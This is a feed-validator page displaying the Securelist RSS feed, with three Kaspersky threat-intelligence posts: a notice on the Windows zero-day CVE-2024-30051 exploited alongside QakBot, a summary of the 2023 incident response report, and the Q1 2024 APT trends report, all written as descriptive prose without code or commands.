Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://securelist.com/feed/

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://securelist.com</link>
  14. <description></description>
  15. <lastBuildDate>Fri, 17 May 2024 08:51:49 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.5.2</generator>
  22.  
  23. <image>
  24. <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url>
  25. <title>Securelist</title>
  26. <link>https://securelist.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>QakBot attacks with Windows zero-day (CVE-2024-30051)</title>
  32. <link>https://securelist.com/cve-2024-30051/112618/</link>
  33. <comments>https://securelist.com/cve-2024-30051/112618/#respond</comments>
  34. <dc:creator><![CDATA[Boris Larin, Mert Degirmenci]]></dc:creator>
  35. <pubDate>Tue, 14 May 2024 17:14:38 +0000</pubDate>
  36. <category><![CDATA[Software]]></category>
  37. <category><![CDATA[CVE-2024-30051]]></category>
  38. <category><![CDATA[Microsoft Windows]]></category>
  39. <category><![CDATA[QakBot]]></category>
  40. <category><![CDATA[Vulnerabilities]]></category>
  41. <category><![CDATA[Vulnerabilities and exploits]]></category>
  42. <category><![CDATA[Zero-day vulnerabilities]]></category>
  43. <category><![CDATA[Vulnerabilities and exploits]]></category>
  44. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112618</guid>
  45.  
  46. <description><![CDATA[In April 2024, while researching CVE-2023-36033, we discovered another zero-day elevation-of-privilege vulnerability, which was assigned the identifier CVE-2024-30051 and patched on May 14 as part of Microsoft's Patch Tuesday. We have seen it exploited by QakBot and other malware.]]></description>
  47. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" fetchpriority="high" /></p><p>In early April 2024, we decided to take a closer look at the Windows DWM Core Library Elevation of Privilege Vulnerability <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033" target="_blank" rel="noopener">CVE-2023-36033</a>, which was previously discovered as a zero-day exploited in the wild. While searching for samples related to this exploit and attacks that used it, we found a curious document uploaded to VirusTotal on April 1, 2024. This document caught our attention because it had a rather descriptive file name, which indicated that it contained information about a vulnerability in Windows OS. Inside we found a brief description of a Windows Desktop Window Manager (DWM) vulnerability and how it could be exploited to gain system privileges, everything written in very broken English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033, but the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing some important details about how to actually trigger the vulnerability, there was a high chance that the described vulnerability was completely made up or was present in code that could not be accessed or controlled by attackers. But we still decided to investigate it, and a quick check showed that this is a real zero-day vulnerability that can be used to escalate privileges. 
We promptly reported our findings to Microsoft, the vulnerability was designated <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-30051" target="_blank" rel="noopener">CVE-2024-30051</a>, and a patch was released on May 14, 2024, as part of Patch Tuesday.</p>
  48. <p>After sending our findings to Microsoft, we began to closely monitor our statistics in search of exploits and attacks that exploit this zero-day vulnerability, and in mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with <a href="https://securelist.com/?s=QakBot" target="_blank" rel="noopener">QakBot</a> and other malware, and believe that multiple threat actors have access to it.</p>
  49. <p>We are going to publish technical details about CVE-2024-30051 once users have had time to update their Windows systems.</p>
  50. <p>Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the verdicts:</p>
  51. <ul>
  52. <li>PDM:Exploit.Win32.Generic;</li>
  53. <li>PDM:Trojan.Win32.Generic;</li>
  54. <li>UDS:DangerousObject.Multi.Generic;</li>
  55. <li>Trojan.Win32.Agent.gen;</li>
  56. <li>Trojan.Win32.CobaltStrike.gen.</li>
  57. </ul>
  58. <p><em>Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.</em></p>
  59. ]]></content:encoded>
  60. <wfw:commentRss>https://securelist.com/cve-2024-30051/112618/feed/</wfw:commentRss>
  61. <slash:comments>0</slash:comments>
  62. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert.jpg" width="1927" height="1037"><media:keywords>full</media:keywords></media:content>
  63. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-1024x551.jpg" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
  64. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-300x161.jpg" width="300" height="161"><media:keywords>medium</media:keywords></media:content>
  65. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  66. </item>
  67. <item>
  68. <title>Incident response analyst report 2023</title>
  69. <link>https://securelist.com/kaspersky-incident-response-report-2023/112504/</link>
  70. <comments>https://securelist.com/kaspersky-incident-response-report-2023/112504/#comments</comments>
  71. <dc:creator><![CDATA[Kaspersky GERT, Kaspersky Security Services]]></dc:creator>
  72. <pubDate>Tue, 14 May 2024 11:00:59 +0000</pubDate>
  73. <category><![CDATA[SOC, TI and IR posts]]></category>
  74. <category><![CDATA[Cybersecurity]]></category>
  75. <category><![CDATA[Incident response]]></category>
  76. <category><![CDATA[Internal Threats Statistics]]></category>
  77. <category><![CDATA[LockBit]]></category>
  78. <category><![CDATA[Ransomware]]></category>
  79. <category><![CDATA[Security services]]></category>
  80. <category><![CDATA[Internal threats]]></category>
  81. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112504</guid>
  82.  
  83. <description><![CDATA[The report shares statistics and observations from incident response practice in 2023, analyzes trends and gives cybersecurity recommendations.]]></description>
  84. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13125640/Kaspersky-IR_Analyst_report_2023_EN.pdf" target="_blank" rel="noopener">Incident response analyst report 2023</a></p>
  85. <p>As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. Our annual Incident Response Report presents anonymized statistics on the cyberattacks we investigated in 2023. All data is derived from working with organizations that requested our expertise in carrying out incident response (IR) or assisting their in-house expert team.</p>
  86. <h2 id="distribution-of-incidents-by-region-and-industry">Distribution of incidents by region and industry</h2>
  87. <p>The geography of the service has changed somewhat of late, with the share of requests in Russia and the CIS (47.27%) continuing to rise. At the same time, 2023 is notable for the significant increase in the number of IR requests in the second-place Americas region (21.82%).</p>
  88. <div id="attachment_112608" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01.jpeg" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112608" class="size-large wp-image-112608" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-1024x643.jpeg" alt="Geographic distribution of IR requests, 2023" width="1024" height="643" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-1024x643.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-300x188.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-768x482.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-557x350.jpeg 557w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-740x465.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-446x280.jpeg 446w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-800x503.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01.jpeg 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112608" class="wp-caption-text">Geographic distribution of IR requests, 2023</p></div>
  89. <p>Looking at the distribution of incidents by industry, we see that in 2023 the majority of requests came from government agencies (27.89%) and industrial enterprises (17.01%).</p>
  90. <div id="attachment_112609" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02.jpeg" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112609" class="size-large wp-image-112609" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-1024x755.jpeg" alt="Distribution of organizations that requested IR assistance, by industry, 2023" width="1024" height="755" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-1024x755.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-300x221.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-768x566.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-475x350.jpeg 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-740x546.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-380x280.jpeg 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-800x590.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02.jpeg 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112609" class="wp-caption-text">Distribution of organizations that requested IR assistance, by industry, 2023</p></div>
  91. <h2 id="2023-trends-ransomware-and-supply-chain-attacks">2023 trends: ransomware and supply chain attacks</h2>
  92. <p>In 2023, ransomware remained the most prevalent threat, despite a drop in share to 33.3%, down from 39.8% in 2022. Ransomware targeted organizations indiscriminately, regardless of industry. The most common families we came across in our investigations were <a href="https://securelist.com/tag/lockbit/" target="_blank" rel="noopener">LockBit</a> (27.78%), <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat</a> (12.96%), Phobos (9.26%) and Zeppelin (9.26%).</p>
  93. <p>Another important trend we observed in 2023 was the significant rise in the number of attacks through trusted relationships with contractors and service providers. This attack vector was among the three most frequently seen in 2023. This is not surprising, for it allows threat actors to carry out large-scale attacks with a great deal more efficiency than if they targeted each victim individually. For many organizations such attacks can be devastating, and detecting them takes a lot longer because the attackers&#8217; actions can be hard to distinguish from those of employees working for a contractor.</p>
  94. <h2 id="report-contents">Report contents</h2>
  95. <p>The full report covers:</p>
  96. <ul>
  97. <li>IR statistics: what events prompted organizations to request IR services, at what stages attacks were detected, how long it took on average to respond to them;</li>
  98. <li>Common tactics, techniques and procedures employed by threat actors at different stages of attack development;</li>
  99. <li>Legitimate tools used in attacks, with examples of their use in real-world incidents;</li>
  100. <li>Vulnerabilities most often exploited by threat actors.</li>
  101. </ul>
  102. <h2 id="recommendations-for-preventing-cyberincidents">Recommendations for preventing cyberincidents</h2>
  103. <p>To reduce the risk of a successful cyberattack on your organization, or minimize the damage if attackers do penetrate your infrastructure, we recommend:</p>
  104. <ul>
  105. <li>Enforcing a strict password policy and protecting key resources with multi-factor authentication;</li>
  106. <li>Closing remote management ports to outside access;</li>
  107. <li>Promptly updating software and deploying additional security measures for services at the network perimeter;</li>
  108. <li>Cybersecurity awareness training and related activities for employees;</li>
  109. <li>Restricting the use of legitimate tools that may be utilized for attacks on the corporate network, and creating rules for detecting such tools;</li>
  110. <li>Conducting regular cyber drills focused on common attacker techniques;</li>
  111. <li>Backing up data on a regular basis;</li>
  112. <li>Protecting endpoints with EDR solutions;</li>
  113. <li>Subscribing to an IR service guaranteed under an SLA.</li>
  114. </ul>
  115. <p>Read the full <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13125640/Kaspersky-IR_Analyst_report_2023_EN.pdf" target="_blank" rel="noopener">2023 Incident Response Report (PDF)</a>.</p>
  116. ]]></content:encoded>
  117. <wfw:commentRss>https://securelist.com/kaspersky-incident-response-report-2023/112504/feed/</wfw:commentRss>
  118. <slash:comments>1</slash:comments>
  119. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2.jpg" width="1200" height="800"><media:keywords>full</media:keywords></media:content>
  120. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-1024x683.jpg" width="1024" height="683"><media:keywords>large</media:keywords></media:content>
  121. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  122. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  123. </item>
  124. <item>
  125. <title>APT trends report Q1 2024</title>
  126. <link>https://securelist.com/apt-trends-report-q1-2024/112473/</link>
  127. <comments>https://securelist.com/apt-trends-report-q1-2024/112473/#respond</comments>
  128. <dc:creator><![CDATA[GReAT]]></dc:creator>
  129. <pubDate>Thu, 09 May 2024 10:00:28 +0000</pubDate>
  130. <category><![CDATA[APT reports]]></category>
  131. <category><![CDATA[APT]]></category>
  132. <category><![CDATA[Backdoor]]></category>
  133. <category><![CDATA[Careto]]></category>
  134. <category><![CDATA[Cyber espionage]]></category>
  135. <category><![CDATA[DuneQuixote]]></category>
  136. <category><![CDATA[hacktivists]]></category>
  137. <category><![CDATA[Kimsuky]]></category>
  138. <category><![CDATA[Mobile Malware]]></category>
  139. <category><![CDATA[Targeted attacks]]></category>
  140. <category><![CDATA[Trojan]]></category>
  141. <category><![CDATA[APT (Targeted attacks)]]></category>
  142. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112473</guid>
  143.  
  144. <description><![CDATA[The report features the most significant developments relating to APT groups in Q1 2024, including the new malware campaigns DuneQuixote and Durian, and hacktivist activity.]]></description>
  145. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>For more than six years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research. They provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.</p>
  146. <p>This is our latest installment, focusing on activities that we observed during Q1 2024.</p>
  147. <p>Readers who would like to learn more about our intelligence reports or request more information about a specific report, are encouraged to contact <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p>
  148. <h2 id="the-most-remarkable-findings">The most remarkable findings</h2>
  149. <p>The Gelsemium group performs server-side exploitation that effectively leads to a webshell, and uses various custom and public tools deployed with stealth techniques and technologies. The two main implants, <a href="https://securelist.com/the-sessionmanager-iis-backdoor/106868/" target="_blank" rel="noopener">SessionManager</a> and OwlProxy, were first detected in 2022 in the aftermath of the ProxyLogon-type exploitations of Exchange Servers. Our latest investigation was prompted by the discovery of suspicious activity on a server located in Palestine in mid-November 2023, with traces of a previous breach attempt on October 12, 2023. The payloads were distinctively served, veiled as font files, in compressed and encrypted fashion. This characteristic led us to highly similar incidents in Tajikistan and Kyrgyzstan.</p>
  150. <p>Careto is a highly sophisticated threat actor that has been seen targeting various high-profile organizations since at least 2007. However, the last operations conducted by this threat actor were observed in 2013. Since then, no information about Careto&#8217;s activity has been published. Recent threat hunting enabled us to gain an insight into campaigns run by Careto in 2024, 2022 and 2019. Our private report provided a detailed description of these activities, focusing on how the actor performed the initial infections, lateral movement, malware execution, and data exfiltration activities. It is notable that the Careto actor used custom techniques, such as employing the MDaemon email server to maintain a foothold inside the organization or leveraging the HitmanPro Alert driver for persistence. In total, we have seen Careto use three complex implants for malicious activities, which we dubbed &#8220;FakeHMP&#8221;, &#8220;Careto2&#8221;, and &#8220;Goreto&#8221;. The capabilities of these implants were also described in our private report.</p>
  151. <h2 id="middle-east">Middle East</h2>
  152. <p>In March, a <a href="https://securelist.com/dunequixote/112425/" target="_blank" rel="noopener">new malware campaign</a> was discovered, targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;. Our investigation uncovered more than 30 DuneQuixote dropper samples actively employed in this campaign. The droppers are tampered-with installer files for a legitimate tool named &#8220;Total Commander&#8221;. These carry malicious code for downloading further payloads, at least some of which are backdoor samples dubbed &#8220;CR4T&#8221;. At the time of discovery, we identified only two such implants, yet we strongly suspect the existence of others that may come in the form of completely different malware. The group prioritized the prevention of collection and analysis of their implants – the DuneQuixote campaigns display practical and well-designed evasion methods, both in network communications and malware code.</p>
  153. <p>Our last report on the Oilrig APT discussed how IT service providers were potentially used as a pivot point to reach their clients as an end-target, and we kept tracking the threat actor&#8217;s activity to identify relevant infection attempts. We detected another activity in the process, likely by the same threat actor, but this time targeting an internet service provider in the Middle East. This new activity saw the actor using a .NET-based implant, which is staged using VB and PowerShell. The implant, which we named &#8220;SKYCOOK&#8221; for its function names, is a remote command execution and infostealer utility. The actor also used an autohotkey-based (AHK) keylogger similar to the one used in a previous intrusion.</p>
  154. <h2 id="southeast-asia-and-korean-peninsula">Southeast Asia and Korean Peninsula</h2>
  155. <p>We have been tracking the activities of DroppingElephant in the past few years and recently detected several samples of the Spyder backdoor in its operations, as well as the Remcos RAT and, in a smaller number of cases, other malicious RAT tools. We observed that the threat actor abuses the DISCORD CDN network and leverages malicious .DOC and .LNK files to deliver these remote access tools to victims in South Asia. The Spyder backdoor has been <a href="https://www.google.com/url?q=https://ti.qianxin.com/blog/articles/Patchwork-Group-Utilizing-WarHawk-Backdoor-Variant-Spyder-for-Espionage-against-Multiple-Countries-EN/&amp;sa=D&amp;source=docs&amp;ust=1713519242825624&amp;usg=AOvVaw2X7T0-3A0QHTLR_7Mn86mw" target="_blank" rel="noopener">detailed by QiAnXin</a>, along with its use in targeting multiple entities in South Asia. In our report, we shared newly discovered IoCs and the type of targeted organizations based on our telemetry.</p>
  156. <p>At the end of 2023, we discovered a striking malware variant orchestrated by the Kimsuky group, delivered by exploiting legitimate software exclusive to South Korea. While the precise method used to manipulate this legitimate program as the initial infection vector remains unclear, we confirmed that the legitimate software established a connection to the attacker&#8217;s server. Subsequently, it retrieved a malicious file, thereby initiating the first stage of the malware.</p>
  157. <p>The initial-stage malware serves as a conventional installer designed to introduce supplementary malware and establish a persistence mechanism. Upon execution of the installer, it generates a subsequent stage loader and adds it to the Windows service for automatic execution. The culminating payload in this sequence is previously unknown Golang-based malware dubbed &#8220;Durian&#8221;. Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads and exfiltration of files.</p>
  158. <p>With the help of Durian, the operator implemented various preliminary methods to sustain a connection with the victim. First, they introduced additional malware named &#8220;AppleSeed&#8221;, an HTTP-based backdoor commonly employed by the Kimsuky group. Furthermore, they incorporated legitimate tools, including ngrok and Chrome Remote Desktop, along with a custom proxy tool, to access target machines. Ultimately, the actor implanted the malware to pilfer browser-stored data including cookies and login credentials.</p>
  159. <p>Based on our telemetry, we pinpointed two victims within the South Korean cryptocurrency sector. The first compromise occurred in August 2023, followed by a second in November 2023. Notably, our investigation did not uncover any additional victims during these instances, indicating a highly focused targeting approach by the actor.</p>
  160. <p>Given that the actor exclusively employed the AppleSeed malware, a tool historically associated with the Kimsuky group, we have a high level of confidence in attributing these attacks to Kimsuky. However, intriguingly, we have detected a tenuous connection with the Andariel group. Andariel, known for adopting a custom proxy tool named &#8220;LazyLoad&#8221;, appears to share similarities with the actor in this attack, who also utilized LazyLoad, as observed during our research. This nuanced connection warrants further exploration into the potential collaboration or tactics shared between these two threat actors.</p>
  161. <p>ViolentParody is a backdoor detected inside a South Korean gaming company, with the latest deployments observed in January this year. The threat actor distributed this backdoor over the organization&#8217;s network by infecting a batch file located on an internal network share. The execution of said infected .BAT file results in the launch of an MSI installer that in turn drops the backdoor on the machine and configures it to persist through scheduled tasks and COM objects. Analysis of this backdoor revealed that it could collect reconnaissance data on the infected machine, perform file system operations and inject various payloads. We additionally observed the threat actor behind this backdoor launching penetration testing tools, such as Ligolo-ng, Inveigh and Impacket. We attribute the activity described in our report to Winnti with low confidence.</p>
  162. <p>The threat actor SideWinder launched hundreds of attacks in recent months against high-profile entities in Asia and Africa. Most of the attacks start with a spear-phishing email containing a Microsoft Word document or a ZIP archive with an LNK file inside. The attachment kicks off a chain of events that lead to the execution of multiple intermediate stages with different JavaScript and .NET loaders, and finally ends with a malicious implant developed in .NET that runs only in memory.</p>
  163. <p>During the investigation, we observed a rather large infrastructure composed of many different virtual private servers and dozens of subdomains. Many subdomains are assumed to be created for specific victims, and the naming scheme indicated that the attacker had tried to disguise malicious communications as legitimate traffic from websites related to governmental entities or logistics companies.</p>
  164. <p>SideWinder has historically targeted governmental and military entities in South Asia, but in this case, we observed an expanded range of targets. The actor also compromised victims located in Southeast Asia and Africa. Moreover, we saw different diplomatic entities in Europe, Asia and Africa that were compromised. The expansion in targeting also includes new industries, proven by the discoveries of new targets in the logistics sector, more specifically in maritime logistics.</p>
  165. <p>The <a href="https://securelist.com/tag/lazarus/" target="_blank" rel="noopener">Lazarus</a> group has various malware clusters in its arsenal and continues to update its functionalities and techniques to evade detection. However, the actor can also be observed employing its old malware on occasion. We recently discovered that this notorious actor was testing its old and familiar tool, <a href="https://securelist.com/lazarus-threatneedle/100803/" target="_blank" rel="noopener">ThreatNeedle</a>. The malware author utilized a binder tool to create initial-stage malware for delivering and implanting the final payload. The main objective of the binder tool is assembling the malware installer, actual payload and configuration. In addition, we discovered various malicious files from an affected machine fetching the next-stage payload after sending the victim&#8217;s profile. This kind of downloader malware is typical of Lazarus&#8217;s modus operandi. However, the group adopted a more complex HTTP communication format at this time to evade detection at the network level. By investigating the Command-and-Control (C2) resources used by the actor, we discovered <a href="https://en.wikipedia.org/wiki/Npm" target="_blank" rel="noopener">NPM</a> packages that contain malicious JavaScript code to deliver malware without user notification. Most of them are disguised as cryptocurrency-related programs and capable of downloading an additional payload from the actor-controlled server. This is a highly similar strategy to the scheme that we have observed and reported in the past.</p>
  166. <h2 id="hacktivism">Hacktivism</h2>
  167. <p>Hacktivism, a marriage of hacking and activism, is often excluded from a company&#8217;s threat profile. This type of threat actor is commonly active in all types of crises, conflicts, wars and protests, among other events. The goal is to send a political, social or ideological message using digital means.</p>
  168. <p>SiegedSec stepped up its hacktivist intrusions and activities internationally throughout 2023. This small group, active since 2022, mainly performs hack-and-leak operations. As with past hacktivist groups like LulzSec, what started as hack-and-leak and disruptive operations &#8220;just for lulz&#8221;, evolved into multiple offensive efforts in pursuit of social justice-related goals across the globe. The activities also led to coordination with other cybercriminal groups as part of the Five Families hacktivist collective, although SiegedSec were later expelled for alleged improper conduct.</p>
  169. <p>Their recent offensive activity is contingent on current socio-political events. Their web-application-focused offensive activity targets companies and industrial and government infrastructure, and they leak stolen sensitive information. SiegedSec&#8217;s social justice initiatives include demanding freedom for an arrested Colombian website defacer / hacker, and protesting U.S. state governments&#8217; involvement in instituting anti-abortion laws, the ongoing Israel-Hamas conflict and alleged human rights violations by NATO. The group&#8217;s members, both past and present, are still at large.</p>
  170. <p>During the Israel-Hamas conflict, there has been an uptick in activities by hacktivists from all around the world, including denial of service (DoS and DDoS), web defacements, doxing and recycling of old leaks. The targets and victims have been primarily Israeli and Palestinian infrastructure. But since there are supporters on both sides of this conflict, hacktivists also target the infrastructure of supporting countries.</p>
  171. <p>To mitigate exposure to threat actors of this type, it is first important to update the threat/risk profile when similar events happen. Second, it is vital to understand the technology exposure connected to the respective country or institution, and prevent unauthorized access by ensuring secure access and updated software. Third, DoS/DDoS readiness is essential. Although these attacks are transient, merely denying access for a limited time before normal service resumes, the respective tools are widely available, and their disruptive impact on business operation may vary depending on attack duration and size. Therefore, it is essential to implement measures to mitigate against application and volumetric attacks. Finally, data leaks are almost inevitable nowadays. Hackers may merely start with stolen credentials to gain full enterprise access and leak sensitive data. The data may then get recycled in future events, to associate the hot topic of compromise with the hacktivist message, so that it can be heard widely. The best approach to mitigate against this is to prevent the data leak in the first place. Implementing ways to monitor the network flow can be helpful in identifying an unusually large outbound data flow, which could be blocked at an early stage.</p>
  172. <h2 id="other-interesting-discoveries">Other interesting discoveries</h2>
  173. <p>In 2020, we reported an ongoing campaign, started in 2019, that leveraged what was at the time new Android malware named &#8220;Spyrtacus&#8221;, used against individuals in Italy. The tool exhibited similarities with HelloSpy, the infamous stalkerware used to remotely monitor infected devices. The threat actor first started distributing the malicious APK via Google Play in 2018, but switched to malicious web pages forged to imitate legitimate resources relating to the most common Italian internet service providers in 2019. We have continued to monitor this threat over the years and recently observed a previously unknown Spyrtacus agent developed for Windows. The implant communicates with a C2 resource already reported in one of our previous reports and shares similarities to the Android counterpart in both malware logic and the communication protocol. During the investigation, we discovered other subdomains, which indicate the existence of implants for iOS and macOS, and may indicate the expansion of the group&#8217;s activities to other countries in Europe, Africa and the Middle East.</p>
  174. <h2 id="final-thoughts">Final thoughts</h2>
  175. <p>While the TTPs of some threat actors remain consistent over time, such as heavy reliance on social engineering as a means of gaining a foothold in a target organization or compromising an individual&#8217;s device, others have refreshed their toolsets and expanded the scope of their activities. Our regular quarterly reviews are intended to highlight the most significant developments relating to APT groups.</p>
  176. <p>Here are the main trends that we saw in Q1 2024:</p>
  177. <ul>
  178. <li>The key highlights this quarter include Kimsuky&#8217;s use of the Golang-based backdoor Durian in a supply-chain attack in South Korea, and campaigns focused on the Middle East, including APTs such as Gelsemium, but also hacktivist attacks.</li>
  179. <li>The Spyrtacus malware used for targeting individuals in Italy demonstrates that threat actors continue to develop for multiple platforms, including mobile malware.</li>
  180. <li>APT campaigns continue to be very geographically dispersed. This quarter, we reported campaigns focused on Europe, the Americas, the Middle East, Asia and Africa.</li>
  181. <li>We have seen attacks targeting a variety of sectors, including government, diplomatic, gaming, maritime logistics and an ISP.</li>
  182. <li>Geopolitics remains a key driver of APT development, and cyberespionage remains a prime goal of APT campaigns.</li>
  183. <li>We also continue to see hacktivist campaigns: these have been centered mainly around the Israel-Hamas conflict, but not exclusively, as the activities of SiegedSec illustrate.</li>
  184. </ul>
  185. <p>As always, we would like to note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.</p>
  186. <p><em>Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or other-language-speaking, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information that we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.</em></p>
  187. ]]></content:encoded>
  188. <wfw:commentRss>https://securelist.com/apt-trends-report-q1-2024/112473/feed/</wfw:commentRss>
  189. <slash:comments>0</slash:comments>
  190. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  191. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
